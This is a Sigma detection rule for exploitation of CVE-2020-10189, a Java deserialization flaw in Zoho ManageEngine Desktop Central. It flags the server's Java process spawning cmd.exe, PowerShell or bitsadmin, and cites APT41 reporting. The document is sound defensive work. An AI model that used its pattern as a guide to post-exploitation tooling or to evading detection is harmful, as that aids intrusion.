title: Exploited CVE-2020-10189 Zoho ManageEngine
id: 846b866e-2a57-46ee-8e16-85fa92759be7
status: experimental
description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
references:
    - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10189
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189
    - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
author: Florian Roth
date: 2020/03/25
tags:
    - attack.initial_access
    - attack.t1190
    - attack.execution
    - attack.t1059.001
    - attack.t1086  # an old one
    - attack.t1059.003
    - attack.t1059  # an old one
    - attack.s0190    
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: 'DesktopCentral_Server\jre\bin\java.exe'
        Image|endswith: 
            - '*\cmd.exe'
            - '*\powershell.exe'
            - '*\bitsadmin.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical